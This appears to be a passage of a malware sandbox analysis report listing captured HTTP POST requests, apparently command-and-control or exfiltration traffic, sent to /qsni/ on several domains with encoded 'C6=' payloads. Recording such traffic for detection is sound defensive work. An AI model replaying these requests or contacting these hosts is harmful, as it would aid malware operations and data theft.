          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.deconsurveys.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.deconsurveys.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.deconsurveys.com/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 68 68 72 72 4b 7a 75 54 46 69 6c 32 56 37 71 30 52 63 6a 61 36 39 4e 5f 6a 47 79 67 46 4b 54 67 54 36 44 61 64 56 68 4b 68 75 76 37 46 55 6c 4a 41 59 70 6a 59 73 41 72 46 43 4c 35 30 69 75 32 63 4f 31 77 4b 45 6e 69 4e 79 52 57 6a 44 4c 66 75 6a 4e 67 72 6e 43 49 46 67 47 7a 52 58 56 59 42 47 63 61 28 43 36 4f 52 54 41 39 51 64 6a 7a 7e 36 38 45 5a 78 36 73 75 5f 6a 4b 45 2d 76 36 44 2d 76 6c 57 4d 74 65 49 67 56 6f 7a 58 73 75 28 4f 51 49 48 76 30 34 55 45 41 64 39 41 68 43 6f 48 57 39 74 78 47 58 38 71 54 55 61 4b 46 56 65 42 4d 55 39 48 51 2e 00 00 00 00 00 00 00 00 Data Ascii: C6=hhrrKzuTFil2V7q0Rcja69N_jGygFKTgT6DadVhKhuv7FUlJAYpjYsArFCL50iu2cO1wKEniNyRWjDLfujNgrnCIFgGzRXVYBGca(C6ORTA9Qdjz~68EZx6su_jKE-v6D-vlWMteIgVozXsu(OQIHv04UEAd9AhCoHW9txGX8qTUaKFVeBMU9HQ.
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.deconsurveys.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.deconsurveys.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.deconsurveys.com/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 68 68 72 72 4b 7a 75 54 46 69 6c 32 56 62 32 30 54 37 50 61 38 64 4e 34 6d 47 79 67 4c 61 54 6b 54 37 28 61 64 51 5a 61 68 63 44 37 46 6a 42 4a 41 37 4e 6a 61 73 41 72 56 79 4c 39 35 43 75 61 63 4f 52 53 4b 46 32 56 4e 78 39 57 73 41 7a 66 6d 42 6c 76 28 48 43 4f 42 67 47 77 52 58 56 4a 42 43 77 65 28 43 76 70 52 54 34 39 51 70 62 7a 76 36 38 46 56 52 36 73 75 5f 6a 47 45 2d 76 57 44 36 4c 39 57 4e 30 44 49 53 4e 6f 7a 79 51 75 7a 4e 49 50 42 76 30 6b 64 6b 42 54 38 69 73 78 71 68 50 62 76 55 4f 4b 73 75 58 63 42 4c 39 51 50 51 55 54 72 67 73 78 33 73 61 75 32 48 4c 35 52 68 66 6d 4a 53 64 54 6c 5f 51 65 64 37 50 47 6a 43 65 41 6a 31 76 55 4b 2d 77 54 53 45 56 6a 38 6c 55 42 75 5a 79 54 50 36 53 45 44 58 61 2d 37 41 6d 50 51 4c 28 7a 52 71 34 48 46 55 6a 6b 78 74 52 4f 33 33 69 58 66 79 47 36 46 51 54 4f 6a 71 4a 57 61 37 38 43 57 2d 62 56 72 47 6e 69 28 43 33 49 4b 79 59 4c 6b 58 52 54 4d 4f 62 76 37 47 57 67 30 34 67 52 66 74 74 63 28 56 35 54 72 51 79 6a 47 42 43 31 6d 54 4d 5a 45 70 77 2d 52 6b 70 50 65 53 67 33 31 6d 42 4b 64 62 42 45 77 67 7e 33 4d 6d 4f 51 76 42 35 4d 78 41 51 53 65 47 53 55 57 72 52 51 48 66 6b 6a 71 64 55 32 6e 38 6f 50 39 75 65 54 4f 42 6c 33 34 71 50 6d 41 36 4c 36 28 76 56 30 41 72 49 63 41 73 66 68 36 42 70 4f 44 55 72 73 64 32 59 44 57 42 42 49 4b 52 50 55 51 42 69 43 58 52 34 45 68 35 4a 30 31 6e 6c 5f 4c 50 58 39 28 72 46 69 4b 72 6f 6e 5a 35 31 46 4d 36 48 36 52 6f 45 33 37 63 5a 49 5a 54 63 67 75 45 35 73 6a 51 72 76 7a 43 4e 56 51 35 61 55 51 35 39 6a 74 71 75 61 44 56 46 6f 32 46 4e 47 36 76 64 44 66 78 64 70 4d 52 33 49 38 7a 55 76 70 6d 54 61 55 70 39 48 63 4c 31 55 66 79 76 68 5a 4c 44 79 47 2d 30 75 61 73 61 37 57 35 6b 33 6f 74 58 2d 74 79 70 42 69 34 52 37 57 64 48 33 53 69 68 61 59 37 31 35 28 62 74 6c 35 4f 4d 6e 6b 77 58 39 73 72 57 67 33 42 4d 75 43 38 43 35 45 69 35 62 79 4b 36 72 4f 70 50 6d 4d 44 78 43 73 47 46 75 4e 7a 6b 48 74 75 77 5a 4f 36 66 2d 7e 63 4e 69 56 79 63 6d 43 54 63 30 53 69 4c 2d 28 72 6b 4a 6f 66 7e 69 64 57 63 4f 69 4e 6e 76 41 5f 32 50 54 54 49 69 28 41 6a 78 31 59 4f 51 64 74 7e 72 4a 45 42 4d 39 4b 33 74 42 31 79 37 6a 52 63 58 71 41 31 4f 6f 6f 28 6e 71 6a 6f 6f 66 68 71 2d 62 74 59 54 5a 69 75 75 59 52 64 61 43 52 7e 37 5a 4d 43 74 45 38 75 4b 4e 42 70 55 46 61 76 65 4a 57 73 69 4a 4c 6b 58 6f 76 50 58 4e 6d 46 55 61 35 7a 71 79 56 46 63 68 53 35 52 72 64 5a 4a 64 55 4b 49 33 76 73 46 67 52 50 59 73 45 70 4f 43 55 4d 32 56 43 69 6b 53 45 45 6f 4c 62 46 32 65 52 58 6f 6c 32 30 75 4e 47 4d 73 58 70 53 38 4e 6b 48 43 6b 50 61 6d 6f 67 4f 58 4a 4e 48 64 51 46 35 5
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.pgatraining.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.pgatraining.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.pgatraining.com/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 28 6e 6a 72 39 76 6c 45 35 33 49 62 76 51 38 39 72 71 52 41 4c 4b 56 67 55 43 73 4e 53 62 67 68 6d 55 28 56 53 5a 33 58 53 45 6b 5f 34 64 61 78 4a 2d 52 51 6a 33 4b 4d 47 39 63 31 43 65 4b 4f 57 4c 71 32 62 31 4c 33 4e 37 55 46 5a 53 62 5a 54 75 65 63 73 55 7a 65 44 4c 36 32 38 41 4c 45 53 4e 68 4d 53 53 4b 4c 78 77 69 74 5a 4f 50 39 49 70 58 5a 50 5a 74 73 7e 6f 65 70 78 59 59 72 4c 74 63 58 7e 53 4d 76 6c 62 77 37 44 61 56 72 33 56 67 37 6b 63 4e 51 65 4a 56 42 30 33 62 6e 78 38 71 6d 4a 44 44 72 63 4e 51 78 37 72 39 61 6b 68 57 38 4c 43 63 2e 00 00 00 00 00 00 00 00 Data Ascii: C6=(njr9vlE53IbvQ89rqRALKVgUCsNSbghmU(VSZ3XSEk_4daxJ-RQj3KMG9c1CeKOWLq2b1L3N7UFZSbZTuecsUzeDL628ALESNhMSSKLxwitZOP9IpXZPZts~oepxYYrLtcX~SMvlbw7DaVr3Vg7kcNQeJVB03bnx8qmJDDrcNQx7r9akhW8LCc.
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.pgatraining.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.pgatraining.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.pgatraining.com/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 28 6e 6a 72 39 76 6c 45 35 33 49 62 73 77 4d 39 34 35 35 41 4e 71 56 6e 61 69 73 4e 45 72 67 74 6d 55 7a 56 53 59 79 49 53 53 38 5f 34 50 79 78 49 63 35 51 68 33 4b 4d 41 39 63 35 4d 2d 4c 4e 57 4c 7e 36 62 30 36 4b 4e 34 34 46 5a 78 54 5a 56 71 7e 66 34 30 7a 63 4a 72 36 35 38 41 4b 63 53 4e 52 41 53 52 6e 51 78 7a 53 74 5a 38 58 39 42 35 58 65 52 4a 74 73 7e 6f 65 6c 78 59 59 44 4c 74 46 51 7e 51 39 30 6c 6f 6f 37 43 34 64 72 78 43 30 36 31 4d 4e 55 52 5a 55 30 36 32 47 78 33 71 58 53 41 69 50 77 44 65 49 42 7e 4c 77 49 31 6b 43 36 51 48 53 71 75 79 6c 67 41 70 56 6e 32 67 28 38 70 36 4c 62 67 64 41 2d 4f 34 42 62 39 46 58 41 76 6c 32 75 38 49 51 4c 54 77 6d 65 70 45 30 63 44 6d 45 61 61 73 6b 4f 7a 61 61 69 56 38 4f 57 63 74 75 4b 4e 74 50 73 4a 75 34 43 55 4b 44 48 34 62 61 71 66 33 6c 77 6b 36 33 5f 61 53 6e 47 36 52 78 6f 52 6e 65 43 74 54 71 36 38 69 74 70 6c 4d 36 68 72 73 36 4c 49 34 73 6d 49 70 74 79 69 4f 33 39 65 44 31 37 31 2d 41 64 33 65 46 79 30 56 75 5f 4e 79 4b 6e 7e 39 32 51 55 4a 4a 67 59 6d 68 62 44 48 32 76 28 78 69 50 72 42 6e 69 54 74 49 30 35 4c 72 34 49 7a 5a 47 50 33 67 59 77 4c 4b 30 6e 56 6f 6a 5a 57 5a 31 72 55 6b 77 35 67 74 37 49 77 61 33 6f 44 74 35 30 4b 46 37 6e 74 71 33 4f 42 4d 2d 52 76 48 67 39 4e 4e 73 76 71 48 6f 7a 52 62 66 67 67 49 58 68 6e 41 63 4b 30 31 6a 77 44 55 47 50 38 6b 6a 47 59 46 32 58 70 66 49 77 49 4d 70 77 53 35 6f 61 54 75 6a 69 61 6c 72 6a 54 59 53 52 78 48 48 32 77 39 62 45 2d 30 64 52 7a 33 6d 47 41 64 4e 6d 69 39 53 44 4a 72 48 6d 30 79 66 4f 4b 56 52 4d 57 59 55 4d 45 4d 54 79 62 62 68 7e 48 52 6f 78 79 71 79 66 54 62 51 68 54 32 76 78 4e 71 68 72 45 45 51 6c 75 64 66 73 4b 39 68 4b 74 79 66 69 4b 48 74 56 5f 72 6e 6f 7a 4f 58 55 50 42 6f 6c 54 4c 64 44 35 33 49 79 68 62 63 4d 50 70 77 71 62 5a 67 4a 5f 4f 74 57 6a 28 50 4c 66 73 45 49 6e 42 72 51 65 70 78 45 47 69 70 59 6c 31 71 67 71 62 6b 77 4e 76 31 6e 54 56 52 38 72 53 62 4a 56 36 6a 4a 43 6a 6a 28 4d 72 58 4d 4c 75 4c 7e 57 54 31 52 4d 75 38 33 64 78 42 53 5f 62 74 58 47 73 46 6b 4a 66 38 76 42 38 46 61 48 34 59 42 71 73 6c 4e 6b 57 37 62 4c 47 50 7a 4a 46 42 52 53 7e 33 7a 2d 64 35 59 68 73 4e 73 61 45 33 69 49 4e 70 4c 4c 7a 2d 30 42 4a 47 48 38 51 45 75 77 48 6c 37 34 53 73 4d 64 49 31 6f 31 36 49 6c 31 74 39 76 7a 4c 53 6f 55 54 62 75 45 4d 37 69 58 44 70 46 56 79 7a 4e 46 62 54 31 4b 4d 75 77 57 55 51 55 75 6e 56 35 76 36 68 37 43 64 31 6f 31 30 56 45 51 46 75 6d 6d 63 77 7a 44 42 51 6a 67 30 5f 69 62 7a 57 6c 37 45 35 6e 4f 4e 69 75 46 5a 69 4c 68 6d 45 78 37 47 53 44 54 54 4a 66 6f 64 34 34 4a 70 67 55 37 4d 55 6
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.dammar.netConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.dammar.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dammar.net/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 79 41 38 37 64 2d 54 5f 57 58 36 4c 33 4c 34 4a 39 6c 45 72 54 4b 4a 49 31 59 33 74 4a 61 4d 46 70 71 38 46 6c 63 6f 4c 28 47 38 43 57 4c 47 69 6f 36 79 2d 31 6a 69 48 51 41 4f 65 36 5f 50 76 41 6d 70 5a 7e 5f 4d 55 31 4e 5a 4b 41 72 38 4f 55 64 54 46 42 46 67 78 69 63 7e 4a 69 51 6a 6b 77 35 78 4f 53 44 4d 48 50 57 57 6c 73 55 4f 57 55 37 34 38 58 5a 74 53 6b 67 71 2d 32 38 78 6a 6f 32 77 44 66 4c 33 4c 47 45 75 55 71 4d 58 70 68 4d 68 6c 77 75 64 2d 35 4d 65 58 75 46 6c 63 4a 69 28 64 44 55 61 50 7a 4a 32 66 69 4f 28 5a 62 4f 74 36 6e 58 49 2e 00 00 00 00 00 00 00 00 Data Ascii: C6=yA87d-T_WX6L3L4J9lErTKJI1Y3tJaMFpq8FlcoL(G8CWLGio6y-1jiHQAOe6_PvAmpZ~_MU1NZKAr8OUdTFBFgxic~JiQjkw5xOSDMHPWWlsUOWU748XZtSkgq-28xjo2wDfL3LGEuUqMXphMhlwud-5MeXuFlcJi(dDUaPzJ2fiO(ZbOt6nXI.
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.dammar.netConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.dammar.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dammar.net/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 79 41 38 37 64 2d 54 5f 57 58 36 4c 33 71 49 4a 7e 47 38 72 53 71 4a 4a 36 34 33 74 44 36 4d 42 70 71 77 46 6c 5a 51 68 7e 31 4d 43 57 34 7e 69 70 66 65 2d 6c 54 69 48 57 41 50 58 31 66 50 39 41 6d 38 6f 7e 5f 63 2d 31 50 56 4b 42 4b 73 4f 63 37 48 47 50 56 67 7a 6d 63 7e 4f 69 51 69 67 77 35 68 43 53 44 41 39 50 57 4f 6c 73 47 57 57 66 72 34 37 62 35 74 53 6b 67 71 69 32 38 78 44 6f 79 63 68 66 4b 76 39 48 7a 57 55 71 75 66 70 73 50 4a 6d 67 75 64 36 6c 63 66 68 7e 48 6b 45 4f 68 75 62 4a 55 79 65 74 63 6e 79 6e 63 57 77 66 64 74 61 39 51 46 6c 6a 6e 74 65 76 66 79 77 57 56 73 65 35 5f 70 31 4b 35 46 4e 6b 77 43 77 52 34 5a 4f 44 7a 64 53 37 44 45 4d 47 79 59 54 44 31 33 78 51 49 63 6e 37 53 51 53 36 51 67 59 33 37 77 73 78 43 37 4a 33 31 70 76 49 63 61 30 7a 71 50 45 63 4e 57 74 59 4b 55 37 71 73 38 58 72 49 43 50 59 64 63 67 52 68 33 4d 47 71 56 31 31 43 63 32 30 63 57 54 7e 69 6e 58 6c 36 65 56 73 4b 4b 36 31 73 69 48 62 7a 59 7a 37 4b 44 53 4d 52 6f 65 6e 61 48 56 6f 42 43 63 6d 43 34 45 6d 77 73 4e 45 73 72 42 64 73 35 73 54 51 4c 68 4a 32 31 68 65 67 38 52 5a 73 75 59 36 41 43 4e 4f 46 51 69 44 51 62 34 71 2d 43 4d 43 64 6a 44 6a 31 64 6d 69 56 42 62 42 5a 78 55 44 72 55 5a 6b 59 6b 62 51 35 39 41 49 72 69 72 44 6b 4b 37 64 66 6d 36 43 46 6c 47 75 53 70 66 50 54 70 32 44 59 4b 4b 42 6e 73 78 48 34 35 2d 39 5a 68 54 4b 67 39 32 56 55 65 6a 78 30 69 55 77 41 74 68 6a 6d 61 35 7a 71 64 4e 30 4b 56 49 72 47 76 53 35 79 78 4a 7a 75 4e 65 71 79 6b 79 44 66 65 66 34 46 31 6a 4d 4e 48 70 32 49 35 48 69 2d 6c 4a 47 54 57 63 58 51 6b 36 50 64 47 5a 6b 56 38 47 68 78 72 73 38 4b 64 69 59 68 4e 55 6c 41 36 33 37 46 46 7a 67 51 46 54 4e 6b 30 50 71 47 56 45 78 65 76 52 46 47 47 32 6e 30 4d 45 4b 4f 55 55 74 7a 54 57 45 46 44 49 4e 72 5a 42 5a 39 65 6c 79 71 62 48 6e 42 78 37 50 78 4c 56 56 31 35 70 58 48 4c 59 62 61 36 30 70 79 71 41 70 61 65 71 7a 50 49 66 70 77 42 43 45 41 35 55 48 4b 62 44 52 6a 34 6f 59 74 35 6d 50 2d 79 67 57 74 50 67 39 47 4f 68 4c 44 74 50 7e 64 32 68 70 6a 64 4b 31 77 6e 31 74 6c 61 36 45 54 65 73 4f 47 34 55 6a 63 7e 4a 7e 76 49 56 57 39 35 58 56 7a 78 55 65 44 62 38 47 52 55 7a 74 43 7e 51 72 36 33 64 63 33 64 59 66 70 77 4c 77 79 4c 38 57 79 4a 2d 47 4b 66 76 44 46 53 69 57 30 70 78 72 59 6a 74 6d 46 37 34 48 68 64 69 31 69 46 61 4c 48 30 6b 6b 58 47 2d 56 38 66 36 6a 78 79 47 70 6f 33 4c 34 64 33 65 31 49 79 36 55 49 4d 4d 46 74 7e 79 71 38 58 71 56 66 77 39 6b 62 7a 6b 7e 5a 6b 42 6a 32 6d 50 6f 4e 35 38 62 51 66 6f 38 5f 4e 75 4e 32 34 4c 54 37 64 48 44 42 48 79 79 32 45 42 5a 31 28 6f 28 45 32 5a 39 47 6d 4c 30 63 4a 38 43 4
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.no-leaks.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.no-leaks.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.no-leaks.com/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 37 32 5a 42 50 6a 53 37 7a 4c 45 73 77 42 6c 49 64 54 41 36 78 76 6b 72 49 6b 67 6e 37 53 74 70 76 58 4e 45 73 34 4a 4a 4d 6a 28 64 57 6b 65 2d 76 6b 6b 4e 55 52 6e 36 53 64 58 33 4e 6d 35 67 66 4d 61 34 6a 54 4e 7a 66 41 28 79 28 72 55 74 36 56 57 4f 4e 2d 6a 6f 4d 6c 33 39 67 6c 67 4e 4d 68 69 5a 62 75 61 48 75 77 53 44 31 45 76 79 44 66 76 71 74 6e 4e 65 6e 43 46 6d 32 7a 33 32 52 4a 46 77 43 69 35 33 32 4a 56 78 35 61 73 44 68 61 74 5f 68 4c 42 6a 51 67 50 63 63 73 70 68 4f 51 76 41 6e 75 42 59 67 38 34 79 54 33 65 5f 79 31 7a 7a 4b 53 51 2e 00 00 00 00 00 00 00 00 Data Ascii: C6=72ZBPjS7zLEswBlIdTA6xvkrIkgn7StpvXNEs4JJMj(dWke-vkkNURn6SdX3Nm5gfMa4jTNzfA(y(rUt6VWON-joMl39glgNMhiZbuaHuwSD1EvyDfvqtnNenCFm2z32RJFwCi532JVx5asDhat_hLBjQgPccsphOQvAnuBYg84yT3e_y1zzKSQ.
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.no-leaks.comConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.no-leaks.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.no-leaks.com/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 37 32 5a 42 50 6a 53 37 7a 4c 45 73 69 30 74 49 4f 6c 49 36 35 76 6b 6f 57 30 67 6e 78 79 74 74 76 57 78 45 73 36 6c 5a 4c 57 50 64 57 58 57 2d 76 47 4d 4e 57 52 6e 36 47 74 58 7a 51 57 35 49 66 4d 50 48 6a 54 64 4e 66 44 54 79 7e 4b 45 74 38 51 4c 59 47 75 6a 6d 65 56 33 36 67 6c 67 59 4d 6c 4f 56 62 75 76 69 75 77 61 44 31 79 54 79 42 76 76 31 6a 48 4e 65 6e 43 46 63 32 7a 32 6a 52 4e 68 6f 43 67 49 6f 31 37 39 78 35 34 6b 44 6e 35 46 34 74 62 42 6e 5a 41 4f 63 64 74 30 51 56 69 53 6b 78 76 5a 6a 35 35 45 48 66 6b 54 44 76 77 6a 45 54 55 79 74 6c 56 73 67 47 4a 64 58 28 61 6b 56 54 79 72 73 59 71 61 55 76 7a 6a 79 78 4d 62 74 77 5f 6a 53 4e 4c 6e 45 66 33 4f 69 56 74 6a 39 65 30 42 43 34 4a 67 58 66 48 6c 69 61 4f 78 56 5a 57 4a 7a 68 5a 58 38 71 78 63 73 57 2d 50 76 32 59 53 4b 6e 36 54 42 67 33 72 72 73 52 31 58 4a 4a 38 6f 30 6c 69 30 4d 33 41 6f 75 45 52 2d 41 62 73 36 7a 5f 43 69 6d 4a 52 58 4e 69 6f 4e 31 6c 51 65 62 6e 30 34 34 44 74 30 49 6d 34 5a 4c 7a 51 77 49 59 53 62 63 42 48 75 4b 5f 71 74 75 41 68 46 55 6e 72 47 4e 52 61 71 7a 4d 61 31 32 72 33 50 77 46 38 38 57 48 66 52 67 79 64 34 59 2d 4c 78 57 57 36 49 6c 43 61 42 6b 6f 54 7a 64 71 65 70 69 34 65 6d 43 30 34 59 45 63 46 4e 36 38 55 44 44 35 48 72 69 43 52 37 71 4e 74 4e 30 70 31 33 53 38 65 69 36 6b 79 4a 73 30 77 36 4f 78 53 4c 72 78 62 47 74 71 77 70 43 77 37 46 34 7a 6d 6f 4e 4f 54 79 41 4c 53 4a 73 4f 49 46 28 34 4e 56 55 51 43 43 4f 6a 58 54 79 4d 6f 32 4b 66 31 4e 4f 33 39 53 32 61 46 66 66 75 45 65 50 4b 46 32 4c 75 78 4e 53 32 66 76 34 73 63 45 34 2d 53 57 7e 5a 64 4f 34 63 45 75 47 53 65 71 48 42 50 56 37 6c 41 6f 5a 6d 52 6d 7a 59 56 44 4e 68 4d 33 45 34 43 74 6b 67 76 43 43 6c 4a 70 75 7a 73 30 36 61 64 74 35 52 68 6a 47 32 79 2d 7a 39 36 73 4a 44 48 42 30 36 74 73 44 6a 53 4a 73 35 33 63 49 63 67 2d 32 7a 59 7a 37 57 51 56 68 61 6b 42 56 43 6c 77 51 47 48 33 41 6c 74 66 73 47 42 50 45 61 6e 78 71 64 55 2d 6c 31 71 55 34 77 37 69 31 44 56 4f 51 4c 33 53 6b 75 4c 79 38 68 78 6f 38 59 6c 37 6c 30 74 44 78 58 67 57 5a 38 74 41 30 31 43 41 69 37 53 55 64 53 48 57 4e 6a 28 2d 51 67 4b 63 50 67 33 56 49 41 6a 4d 31 75 30 62 77 6e 52 54 58 53 4b 65 6b 6a 33 6e 37 66 49 57 37 51 61 53 4b 61 63 5f 4c 5f 37 4b 72 61 34 43 39 75 45 7a 56 67 69 51 7e 42 58 4f 4b 4b 53 31 57 49 47 62 76 72 52 51 73 38 71 59 34 61 7e 36 45 31 75 75 37 6d 46 6c 74 64 79 4e 39 46 44 34 59 66 41 73 46 6d 4e 6c 76 49 35 78 64 58 31 43 55 63 46 58 28 34 49 32 64 6c 58 77 34 68 50 42 44 55 62 58 5a 56 66 75 38 72 55 6b 47 6d 69 44 6b 48 33 63 4e 52 51 5f 68 4e 67 31 59 4d 54 35 74 4a 65 41 4d 73 4f 4
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.lozpw.spaceConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.lozpw.spaceUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lozpw.space/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 32 38 58 4a 5a 50 35 49 42 5f 4f 46 75 45 32 65 73 6a 67 72 73 34 35 52 4d 6d 5a 65 45 64 4d 65 79 39 59 2d 6b 6f 44 53 41 74 59 33 72 55 28 79 67 6d 33 72 30 6c 53 46 52 51 57 39 4a 73 7e 5f 34 71 71 4e 4f 43 36 64 62 4c 53 56 49 6a 46 4f 43 5f 67 46 68 45 34 74 4f 64 6e 51 76 33 71 47 4b 6b 74 70 4d 72 5a 46 70 55 31 70 70 6d 66 72 68 6a 66 6e 6d 47 53 4b 53 67 66 33 41 5a 6f 35 68 7a 53 30 32 58 4d 4f 76 78 54 46 61 37 51 61 43 61 6d 68 71 56 36 78 4b 72 28 56 41 36 76 78 6e 69 6f 46 77 50 45 37 67 4e 4e 48 74 5f 57 31 55 49 6d 72 58 33 30 2e 00 00 00 00 00 00 00 00 Data Ascii: C6=28XJZP5IB_OFuE2esjgrs45RMmZeEdMey9Y-koDSAtY3rU(ygm3r0lSFRQW9Js~_4qqNOC6dbLSVIjFOC_gFhE4tOdnQv3qGKktpMrZFpU1ppmfrhjfnmGSKSgf3AZo5hzS02XMOvxTFa7QaCamhqV6xKr(VA6vxnioFwPE7gNNHt_W1UImrX30.
          Source: global trafficHTTP traffic detected: POST /qsni/ HTTP/1.1Host: www.lozpw.spaceConnection: closeContent-Length: 1452Cache-Control: no-cacheOrigin: http://www.lozpw.spaceUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lozpw.space/qsni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 43 36 3d 32 38 58 4a 5a 50 35 49 42 5f 4f 46 75 6b 6d 65 70 45 30 72 34 6f 35 65 4a 6d 5a 65 65 74 4d 61 79 39 55 2d 6b 72 50 43 41 62 41 33 72 48 48 79 67 41 4c 72 7a 56 53 46 56 67 57 35 45 4d 7e 54 34 71 7e 77 4f 48 65 6e 62 4e 43 56 4a 43 56 4f 45 39 59 61 35 45 34 34 4b 64 6e 54 76 33 71 54 4b 6b 38 67 4d 6f 31 5f 70 55 74 70 6f 51 6a 72 6d 54 66 6b 36 32 53 4b 53 67 66 37 41 5a 6f 5a 68 33 32 61 32 58 6b 65 76 42 28 46 64 61 77 61 46 35 7e 69 36 56 36 31 4a 72 7e 4c 50 76 65 76 74 53 35 34 28 64 59 41 38 76 78 4a 74 66 36 6c 48 74 76 71 42 53 72 79 31 54 55 6e 77 54 71 37 36 70 65 6d 47 42 74 6e 4b 74 39 43 6b 59 57 68 71 42 57 53 48 50 6a 41 64 71 52 46 6f 36 55 36 6b 6f 37 6b 5a 4a 6f 65 33 75 39 49 49 68 6b 62 4c 48 72 59 58 76 66 7a 32 79 30 72 5a 32 62 76 55 6d 35 64 78 62 44 48 48 2d 4b 63 46 49 32 79 54 6c 71 6a 47 43 68 39 79 58 55 66 38 54 53 7a 70 63 73 4c 78 34 6d 77 6b 48 4e 6a 72 49 6e 55 73 55 7a 45 4a 79 75 30 37 4c 55 47 46 55 45 38 6c 35 53 36 74 30 68 47 6c 6d 72 64 73 49 76 4c 52 75 6f 35 6c 39 39 6a 39 79 51 39 59 77 36 39 34 42 50 42 76 55 72 73 7a 70 64 70 6e 4d 50 38 57 52 73 45 52 42 42 68 6f 43 6a 4e 6c 36 5a 6a 6b 62 62 63 43 75 36 61 54 68 63 70 71 33 39 6b 50 49 46 4b 37 70 4c 68 6b 2d 67 65 4d 51 50 54 43 67 76 37 39 54 48 47 37 6a 50 6e 76 4d 53 7a 41 4b 58 77 6b 6f 53 4f 30 47 79 36 4e 5a 37 32 43 41 30 61 64 5a 6f 43 31 34 42 58 50 50 47 49 35 4e 71 47 4e 71 76 4b 6c 79 70 6f 46 64 4d 78 6f 50 6f 34 6b 71 76 4f 68 48 72 44 33 4f 74 42 37 50 41 68 31 66 28 34 6d 55 31 35 44 31 59 4d 38 36 7e 64 48 55 41 34 7e 6d 74 50 6f 6e 33 43 7e 76 7e 63 4f 76 4f 2d 52 69 65 42 43 45 6d 32 33 43 46 70 43 32 6b 63 76 68 34 44 64 71 36 71 70 44 54 46 4d 6c 37 61 49 7a 6c 4b 37 32 68 64 4e 4b 73 61 79 39 47 4d 36 36 50 63 77 5f 74 6c 63 7a 33 6c 4a 53 76 4a 36 66 4a 75 4f 71 4b 65 31 71 5a 53 6d 62 56 61 42 43 49 46 31 43 57 51 36 61 45 51 31 69 33 75 71 52 35 2d 77 66 62 77 44 59 45 57 5a 37 55 70 71 6b 34 30 4c 44 54 51 66 57 52 49 47 6e 4e 78 54 55 5a 4e 47 78 48 4b 69 75 6f 6b 42 6f 44 69 35 2d 4d 74 76 58 6d 6d 72 5a 75 45 71 32 68 65 55 4c 6a 4c 52 6f 4f 74 4c 30 71 5f 75 33 53 5f 30 5a 67 66 64 77 66 6b 44 71 37 46 79 65 6e 6c 33 59 57 77 64 49 68 51 68 33 55 55 7a 35 33 47 6b 70 43 76 59 36 72 47 31 6a 41 44 58 38 4b 2d 66 51 48 5a 65 76 32 35 38 31 79 55 58 77 32 35 62 30 45 50 53 31 67 52 35 6d 59 4e 4e 5f 7e 4e 46 34 31 4c 50 73 30 44 4b 39 48 46 45 4c 57 76 37 47 50 77 37 72 78 46 56 67 61 62 75 42 69 76 54 46 42 6c 4d 2d 59 79 70 52 65 54 77 39 64 5a 4d 6b 79 6d 4b 45 42 73 6f 42 33 4c 59 42 58 31 4a 